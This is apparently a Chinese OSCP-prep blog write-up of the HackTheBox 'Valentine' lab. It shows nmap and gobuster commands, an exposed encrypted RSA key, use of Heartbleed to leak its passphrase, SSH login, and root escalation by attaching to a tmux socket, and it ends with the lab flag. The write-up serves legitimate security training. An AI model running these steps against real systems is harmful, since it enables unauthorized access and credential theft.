OSCP备考_0x08_HackThBox靶机_Linux_Valentine

Ethan医生6天前靶场18

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.3.150 (扫描TCP)

image.png


nmap -sU --top-ports 100 10.129.3.150 (扫描UDP)

image.png

gobuster dir -u https://10.129.3.150/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,html -k

image.png


http://10.129.3.150/dev/

image.png

http://10.129.3.150/dev/hype_key

image.png

https://www.convertstring.com/EncodeDecode/HexDecode#google_vignette


-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,AEB88C140F69BF2074788DE24AE48D46


DbPrO78kegNuk1DAqlAN5jbjXv0PPsog3jdbMFS8iE9p3UOL0lF0xf7PzmrkDa8R

5y/b46+9nEpCMfTPhNuJRcW2U2gJcOFH+9RJDBC5UJMUS1/gjB/7/My00Mwx+aI6

0EI0SbOYUAV1W4EV7m96QsZjrwJvnjVafm6VsKaTPBHpugcASvMqz76W6abRZeXi

Ebw66hjFmAu4AzqcM/kigNRFPYuNiXrXs1w/deLCqCJ+Ea1T8zlas6fcmhM8A+8P

OXBKNe6l17hKaT6wFnp5eXOaUIHvHnvO6ScHVWRrZ70fcpcpimL1w13Tgdd2AiGd

pHLJpYUII5PuO6x+LS8n1r/GWMqSOEimNRD1j/59/4u3ROrTCKeo9DsTRqs2k1SH

QdWwFwaXbYyT1uxAMSl5Hq9OD5HJ8G0R6JI5RvCNUQjwx0FITjjMjnLIpxjvfq+E

p0gD0UcylKm6rCZqacwnSddHW8W3LxJmCxdxW5lt5dPjAkBYRUnl91ESCiD4Z+uC

Ol6jLFD2kaOLfuyee0fYCb7GTqOe7EmMB3fGIwSdW8OC8NWTkwpjc0ELblUa6ulO

t9grSosRTCsZd14OPts4bLspKxMMOsgnKloXvnlPOSwSpWy9Wp6y8XX8+F40rxl5

XqhDUBhyk1C3YPOiDuPOnMXaIpe1dgb0NdD1M9ZQSNULw1DHCGPP4JSSxX7BWdDK

aAnWJvFglA4oFBBVA8uAPMfV2XFQnjwUT5bPLC65tFstoRtTZ1uSruai27kxTnLQ

+wQ87lMadds1GQNeGsKSf8R/rsRKeeKcilDePCjeaLqtqxnhNoFtg0Mxt6r2gb1E

AloQ6jg5Tbj5J7quYXZPylBljNp9GVpinPc



https://10.129.3.150/decode.php


image.png


https://10.129.3.150/encode.php

image.png


心跳滴血

nmap --script=ssl-heartbleed -p 443 10.129.3.150

image.png


searchsploit heartbleed

image.png

使用heartbleed获取密码

image.png

经过解码获取明文信息
明文:heartbleedbelievethehype 


 强制客户端使用 ssh-rsa

ssh -o PubkeyAcceptedKeyTypes=+ssh-rsa -i rsa hype@10.129.235.13


Tmux 是一个终端复用器(terminal multiplexer),非常有用,属于常用的开发工具。


最终发现执行历史命令中的 tmux -S /.devs/dev_sess 即可进行提权操作

/usr/bin/tmux -S /.devs/dev_sess

image.png

c3122f8dfb822a6a3b192ec4c5ef3577



标签: OSCP

相关文章

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

OSCP备考_0x11_HackThBox靶机_Linux_Tartarsauce

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.73.179 (扫描TCP)nmap -sU --top-ports 100 10.129.73....

OSCP备考_0x14_Vulnhub靶机_Raven: 2

OSCP备考_0x14_Vulnhub靶机_Raven: 2

名称说明靶机下载链接https://www.vulnhub.com/entry/raven-2,269/攻击机(kali)ip:192.168.233.168靶机(CentOS)ip:192.168....

OSCP备考_0x06_HackThBox靶机_Linux_Sense

OSCP备考_0x06_HackThBox靶机_Linux_Sense

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.131.103 (扫描TCP)上面的信息提供了直接跳转到443端口nmap -sU --top-ports...

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

OSCP备考_0x22_HackThBox靶机_Linux_postman

OSCP备考_0x22_HackThBox靶机_Linux_postman

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.20.206 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x29_HackThBox靶机_Linux_tabby

OSCP备考_0x29_HackThBox靶机_Linux_tabby

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.173.82 (扫描TCP)nmap -sU --top-ports 100 ...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。